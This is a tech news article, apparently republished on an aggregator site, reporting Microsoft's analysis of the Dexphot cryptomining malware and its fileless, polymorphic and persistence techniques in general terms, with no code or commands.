• Contact Us
  • Login
Upgrade
Tech News Hero
Advertisement
  • Home
  • News
  • Gadgets
  • Social
  • Gaming
  • Mobile
  • PC
  • Internet
  • Security
  • Apps
No Result
View All Result
  • Home
  • News
  • Gadgets
  • Social
  • Gaming
  • Mobile
  • PC
  • Internet
  • Security
  • Apps
No Result
View All Result
Tech News Hero
No Result
View All Result
Home Security

Microsoft says new Dexphot malware infected more than 80,000 computers

by technewshero
November 26, 2019
in Security
0
Share on FacebookShare on Twitter
dexphot-stats.png

Image: Microsoft

Microsoft security engineers detailed today a new malware strain that has been infecting Windows computers since October 2018 to hijack their resources to mine cryptocurrency and generate revenue for the attackers.

Named Dexphot, this malware reached its peak in mid-June this year, when its botnet reached almost 80,000 infected computers.

Since then, the number of daily infections has been slowly going down, as Microsoft claims it deployed countermeasures to improve detections and stop attacks.

A complex malware strain for a mundane task

But while Doxphot’s end goal was banal, the methods and techniques for its modus operandi stood out due to their high level of complexity, something that Microsoft also noticed.

“Dexphot is not the type of attack that generates mainstream media attention,” said Hazel Kim, a malware analyst for the Microsoft Defender ATP Research Team, referring to the malware’s mundane task of mining cryptocurrency, rather than stealing user data.

“It’s one of the countless malware campaigns that are active at any given time. Its goal is a very common one in cybercriminal circles – to install a coin miner that silently steals computer resources and generates revenue for the attackers,” Kim said.

“Yet Dexphot exemplifies the level of complexity and rate of evolution of even everyday threats, intent on evading protections and motivated to fly under the radar for the prospect of profit.”

In a report shared with ZDNet that’s scheduled to go live later today, Kim details Dexphot’s advanced techniques, such as the use of fileless execution, polymorphic techniques, and smart and redundant boot persistence mechanisms.

Infection process

According to Microsoft, Dexphot is what security researchers call a second-stage payload — a type of malware that’s dropped on systems that are already infected by other malware.

In this case, Dexphot was being dropped on computers that were previously infected with ICLoader, a malware strain that’s usually side-installed as part of software bundles, without the user’s knowledge, or when users downloaded and installed cracked or pirated software.

On some of these ICLoader-infected systems, the ICLoader gang would download and run the Dexphot installer.

Microsoft says this installer would be the only part of the Dexphot malware that would be written to disk, but only for a short period of time. Every other Dexphot file or operation would use a technique known as fileless execution to run inside the computer’s memory only, making the malware’s presence on a system invisible to classic signature-based antivirus solutions.

Furthermore, Dexphot would also employ a technique called “living off the land” (or LOLbins) to (ab)use legitimate Windows processes to execute malicious code, rather than run its own executables and processes.

For example, Microsoft says Dexphot would regularly abuse msiexec.exe, unzip.exe, rundll32.exe, schtasks.exe, and powershell.exe, all legitimate apps that come pre-installed on Windows systems. By using these processes to start and run malicious code, Dexphot effectively became indistinguishable from other local apps that were allso using these Windows utilities to do their jobs.

dexphot-modus-operandi.png

Image: Microsoft

But Dexphot operators didn’t stop here. Because in recent years antivirus products have been using cloud-based systems to inventory and centralize patterns of malicious fileless execution and LOLbins abuse, Dexphot also employed a technique called polymorphism.

This technique refers to malware that constantly changes its artifacts. According to Microsoft, Dexphot operators changed the file names and URLs used in the infection process once every 20-30 minutes.

By the time an antivirus vendor would detect a pattern in Dexphot’s infection chain, that pattern would change, and allow the Dexphot gang to stay a step ahead of cyber-security products.

Multi-layered persistence mechanisms

But no malware stays undetected forever, and even in these cases, the Dexphot gang had planned ahead.

Microsoft says that Dexphot came with clever persistence mechanisms that would often re-infect systems that were not cleaned of all of the malware’s artifacts.

For the first, the malware used a technique called process hollowing to start two legitimate processes (svchost.exe and nslookup.exe), hollow their content, and run malicious code from within them.

Disguised as legitimate Windows processes, these two Dexphot components would keep an eye out that all the malware’s components were up and running, and reinstall the malware if one of them were stopped. Because there were two “monitoring” processes, even if system administrators or antivirus software removed one, the second would serve as a backup and re-infect the system later on.

Second, also working as a failsafe, Dexphot also used a series of scheduled tasks to make sure the victim is fileslessly reinfected after every reboot, or once every 90 or 110 minutes.

Because the tasks were scheduled to run at regular intervals, they also served as a way for the Dexphot gang to deliver updates to all infected systems.

According to Microsoft, every time one of these tasks ran, it downloaded a file from an attacker’s server, allowing the attacker to modify this file with updated instructions for all of the Dexphot infected hosts and update their entire botnet within hours after an antivirus vendor deployed any countermeasures.

Further, Microsoft says that polymorphism was also used for these tasks, with the Dexphot gang changing task names at regular intervals. This simple trick allowed the malware to skirt any blocklists that blocked scheduled tasks by their names.

As Microsoft’s Kim pointed out above, all of these techniques are terribly complicated. One would normally expect these types of redundancies to be found in the infection chains for malware developed by advanced government-backed hacking units.

However, in the last two years, these techniques have been slowly trickling down to cyber-criminal gangs, and are now pretty much a common occurrence in something as mundane as a crypto-currency mining operation like Dexphot, infostealers like Astaroth, or click-fraud operations like Nodersok.

Previous Post

Best 40-inch TV 2019: our top pick TVs in the 40-inch range

Next Post

Alibaba’s Hong Kong Shares Rise 6.6 Percent on Debut in Heavy Volume

technewshero

technewshero

Related Posts

2020 Shows the Danger of a Decapitated Cyber Regime
Security

2020 Shows the Danger of a Decapitated Cyber Regime

by technewshero
January 13, 2021
A ‘Bulletproof’ Criminal VPN Was Taken Down in a Global Sting
Security

A ‘Bulletproof’ Criminal VPN Was Taken Down in a Global Sting

by technewshero
January 14, 2021
The Worst Hacks of 2020, a Surreal Pandemic Year
Security

The Worst Hacks of 2020, a Surreal Pandemic Year

by technewshero
January 15, 2021
How to Understand the Russia Hack Fallout
Security

How to Understand the Russia Hack Fallout

by technewshero
December 22, 2020
A Massive Fraud Operation Stole Millions From Online Bank Accounts
Security

A Massive Fraud Operation Stole Millions From Online Bank Accounts

by technewshero
December 21, 2020
Next Post

Alibaba's Hong Kong Shares Rise 6.6 Percent on Debut in Heavy Volume

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Most Popular

Windows 10 shutdown bug makes powering down take over a minute

June 26, 2019
The year’s best apps, 2020’s biggest downloads, the App Store’s newest hire – TechNewHero

The year’s best apps, 2020’s biggest downloads, the App Store’s newest hire – TechNewHero

December 13, 2020

John Oliver slams Disney’s Hotstar for censoring his show – TechNewHero

March 9, 2020

Browse by Category

  • Apps
  • Gadgets
  • Gaming
  • Internet
  • Mobile
  • News
  • PC & Laptops
  • Security
  • Social
Tech News Hero

© 2020 Tech News Hero.

No Result
View All Result
  • Home
  • Landing Page
  • Buy JNews
  • Support Forum
  • Contact Us

© 2020 Tech News Hero.

Welcome Back!

Login to your account below

Forgotten Password?

Create New Account!

Fill the forms bellow to register

All fields are required. Log In

Retrieve your password

Please enter your username or email address to reset your password.

Log In
Are you sure want to unlock this post?
Unlock left : 0
Are you sure want to cancel subscription?